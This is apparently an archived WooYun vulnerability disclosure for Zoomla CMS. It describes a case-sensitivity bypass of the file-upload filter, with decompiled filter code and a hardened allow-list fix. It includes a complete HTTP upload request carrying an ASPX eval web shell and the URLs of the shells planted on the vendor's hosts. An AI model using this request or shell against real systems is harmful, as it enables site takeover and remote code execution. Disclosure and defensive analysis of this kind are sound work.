WooYun (WooYun.org) historical vulnerability search --- http://wy.zone.ci/
WooYun Drops article archive -------------------------- http://drop.zone.ci/
Disclosure timeline:
2015-07-10: Details sent to the vendor, awaiting the vendor's response
2015-07-15: Vendor confirmed; details visible to the vendor only
2015-07-18: Details opened to third-party security partners
2015-09-08: Details opened to core white hats and domain experts
2015-09-18: Details opened to regular white hats
2015-09-28: Details opened to intern white hats
2015-10-13: Details made public
There is a defence in place, but it can be bypassed.
/Plugins/swfFileUpload/UploadHandler.ashx is covered by a global upload filter:
From asp_code.dll, class ZoomlaSecurityCenter (decompiled):

```csharp
class ZoomlaSecurityCenter
{
    public static void CheckUpladFiles()
    {
        HttpRequest request = HttpContext.Current.Request;
        HttpResponse response = HttpContext.Current.Response;
        // Case-sensitive match: a Content-Type header with different casing skips this whole block.
        if (HttpContext.Current.Request.ContentType.IndexOf("multipart/form-data") > -1)
        {
            HttpFileCollection files = request.Files;
            for (int i = 0; i < files.Count; i++)
            {
                HttpPostedFile httpPostedFile = files[i];
                string fileName = httpPostedFile.FileName;
                if (httpPostedFile.ContentLength > 0)
                {
                    if (fileName.IndexOf(".") > -1)
                    {
                        string[] array = fileName.Split(new char[] { '.' });
                        for (int j = 1; j < array.Length; j++)
                        {
                            string ext = array[j].ToString().ToLower();
                            if (!ZoomlaSecurityCenter.ExNameCheck(ext))
                            {
                                string findStr = System.IO.Path.GetExtension(fileName).ToLower().Replace(".", "");
                                string text = SiteConfig.SiteOption.UploadFileExts.ToLower();
                                if (!StringHelper.FoundCharInArr(text, findStr, "|"))
                                {
                                    function.WriteErrMsg("上传的文件不是符合扩展名" + text + "的文件");
                                    response.End();
                                }
                            }
                            else
                            {
                                function.WriteErrMsg("请勿上传可疑文件!");
                                response.End();
                            }
                        }
                    }
                    else
                    {
                        function.WriteErrMsg("请勿上传可疑文件!");
                        response.End();
                    }
                }
            }
        }
    }
}
```
Changing the case of "multipart/form-data" in the Content-Type header is enough to skip the global filter. The handler's own local filter can then be bypassed by changing the case of the file extension.
```http
POST /Plugins/swfFileUpload/UploadHandler.ashx HTTP/1.1
Host: demo.zoomla.cn
Content-Length: 263
Cache-Control: max-age=0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Origin: null
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Ubuntu Chromium/43.0.2357.81 Chrome/43.0.2357.81 Safari/537.36
Content-Type: Multipart/form-data; boundary=----WebKitFormBoundaryNyS0P5wwqaOrCYsh
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.8
Cookie: ASP.NET_SessionId=gwezhhqzegfs5nhcpdeaso5s; bdshare_firstime=1436497685958; jiathis_rdc=%7B%22http%3A//www.zoomla.cn/down/2407.shtml%22%3A%220%7C1436497760852%22%7D; hasshown=1

------WebKitFormBoundaryNyS0P5wwqaOrCYsh
Content-Disposition: form-data; name="Filedata"; filename="name.Aspx"
Content-Type: application/x-aspx

<%@ Page Language="Jscript"%><%eval(Request.Item["zsd"],"unsafe");%>
------WebKitFormBoundaryNyS0P5wwqaOrCYsh--
```
Resulting uploaded files:
http://www.zoomla.cn/uploadfiles/2015/7/10/201507101729516640188.Aspx?zsd=Response.Write(%22wooyun%22);
http://demo.zoomla.cn/uploadfiles/2015/7/10/201507101729537310808.Aspx?zsd=Response.Write(%22wooyun%22);
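Both bypasses come from comparing attacker-controlled strings before normalising their case and from keying the check on a header instead of on the parsed files. The following hardened check is an added example written for this page, not Zoomla's code; the allowed-extension array is an assumed stand-in for SiteConfig.SiteOption.UploadFileExts.

```csharp
using System;
using System.IO;
using System.Linq;
using System.Web;

// Hypothetical hardened replacement for CheckUpladFiles (example, not Zoomla's code).
public static class HardenedUploadCheck
{
    // Assumed allow-list; in the real product this would come from site configuration.
    static readonly string[] AllowedExts = { "jpg", "jpeg", "png", "gif", "pdf", "zip" };

    // True only if every uploaded file in the request is acceptable.
    public static bool RequestIsSafe(HttpRequest request)
    {
        // Do not gate on the raw Content-Type header at all: ASP.NET has already parsed
        // the multipart body (case-insensitively), so request.Files is the ground truth.
        // A request that carries no parsed files has nothing to check.
        for (int i = 0; i < request.Files.Count; i++)
        {
            HttpPostedFile f = request.Files[i];
            if (f.ContentLength <= 0) return false;
            if (!FileNameIsSafe(f.FileName)) return false;
        }
        return true;
    }

    // Pure function on the file name so it can be unit-tested without an HttpContext.
    public static bool FileNameIsSafe(string fileName)
    {
        // Keep only the final path component and reject empty names and embedded NULs.
        string name = Path.GetFileName(fileName ?? string.Empty);
        if (name.Length == 0 || name.IndexOf('\0') >= 0) return false;

        // Normalise case with an invariant culture BEFORE comparing, so "name.Aspx" and
        // "name.aspx" are treated identically (the original compared ".Aspx" elsewhere as-is).
        string ext = Path.GetExtension(name).TrimStart('.').ToLowerInvariant();
        if (ext.Length == 0) return false;

        // Allow-list only: anything not explicitly permitted is rejected, so there is no
        // second, weaker fallback path for extensions the first check does not recognise.
        return AllowedExts.Contains(ext);
    }
}
```

With this check, FileNameIsSafe("name.Aspx") returns false, and a request sent as "Multipart/form-data" is inspected exactly like one sent as "multipart/form-data".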
Severity: Low
Vulnerability Rank: 5
Confirmed: 2015-07-15 09:52
Vendor response: Thanks for the report!